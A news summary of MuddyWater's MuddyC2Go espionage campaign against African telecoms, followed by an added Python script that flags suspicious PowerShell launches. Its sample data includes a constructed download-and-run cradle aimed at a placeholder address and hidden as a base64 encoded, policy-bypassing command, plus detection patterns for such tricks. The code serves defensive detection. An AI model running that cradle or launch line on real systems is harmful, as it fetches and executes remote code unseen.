Iranian hackers are employing a tool called MuddyC2Go in espionage attacks on telecom networks across Africa.

The Iranian nation-state actor MuddyWater, tracked by Symantec as Seedworm, has been using a new command-and-control (C2) framework called MuddyC2Go in cyber espionage attacks on the telecommunications sector in Egypt, Sudan, and Tanzania. MuddyC2Go is a Golang-based tool that replaces the group's earlier PhonyC2 and MuddyC3 frameworks. MuddyWater, linked to Iran's Ministry of Intelligence and Security (MOIS), has been active since at least 2017 and primarily targets entities in the Middle East. Alongside MuddyC2Go, the attacks used the SimpleHelp remote-access tool, the Venom Proxy tool, a custom keylogger, and other publicly available tools, a mix chosen to evade detection while pursuing the group's strategic objectives. The most recent intrusions were observed in November 2023. Symantec recommends that organizations be vigilant regarding suspicious use of PowerShell on their networks.
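Symantec's recommendation above is a detection task. The following added example, which is not code from the source article or from Symantec, shows one way to act on it: a small Python triage script that scores PowerShell process-creation events against generic abuse heuristics (encoded commands, hidden windows, execution-policy bypass, download cradles, Invoke-Expression) and decodes any -EncodedCommand payload before scanning it. The sample events, the payload and the indicator list are constructed for this example; none of them come from the reported MuddyC2Go intrusions, and the heuristics are general PowerShell tradecraft signals rather than indicators the report attributes to MuddyWater.

```python
import base64
import binascii
import re

# Constructed sample process-creation events in a simplified Sysmon Event ID 1 shape.
# These are made up for illustration; they are not telemetry from the intrusions
# described in the article and do not reproduce any MuddyC2Go command line.
_CONSTRUCTED_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage1')"
# PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text.
_CONSTRUCTED_ENCODED = base64.b64encode(_CONSTRUCTED_PAYLOAD.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Service"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -ep bypass -enc {_CONSTRUCTED_ENCODED}"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
]

# Generic PowerShell abuse heuristics (an assumption of this example, not indicators the
# report attributes to MuddyWater). Each one is weak alone, so events are scored on how
# many fire, after any -EncodedCommand payload has been decoded and scanned as well.
INDICATORS = {
    "encoded_command": re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    "hidden_window": re.compile(r"(?:^|\s)-w(?:indowstyle)?\s+hidden\b", re.I),
    "policy_bypass": re.compile(r"(?:^|\s)-e(?:p|x|xec|xecutionpolicy)\s+bypass\b", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I),
    "invoke_expression": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
}


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE plaintext of a -EncodedCommand argument, or None if absent/invalid."""
    m = INDICATORS["encoded_command"].search(cmdline)
    if not m:
        return None
    blob = m.group(0).split()[-1]
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def score_event(event: dict) -> list:
    """Return the names of the indicators that fire for one process-creation event."""
    if not event["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return []
    cmd = event["CommandLine"]
    decoded = decode_encoded_command(cmd)
    # Scan the raw command line plus the decoded payload so cradles hidden in base64 still count.
    text = cmd if decoded is None else cmd + "\n" + decoded
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def find_suspicious(events, threshold: int = 2):
    """Return (command line, fired indicators) for events with at least `threshold` indicators."""
    hits = []
    for ev in events:
        fired = score_event(ev)
        if len(fired) >= threshold:
            hits.append((ev["CommandLine"], fired))
    return hits


if __name__ == "__main__":
    for cmdline, fired in find_suspicious(SAMPLE_EVENTS):
        print(f"[{', '.join(fired)}] {cmdline[:80]}...")
        print("  decoded:", decode_encoded_command(cmdline))
```

In this constructed data only the second event clears the threshold; the third event (a signed backup script run with -ExecutionPolicy Bypass) fires a single indicator and is left alone, which is the point of scoring rather than alerting on any one flag. On a real estate the events would come from Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled, and the threshold and indicator set would be tuned against the organization's own baseline of legitimate PowerShell use.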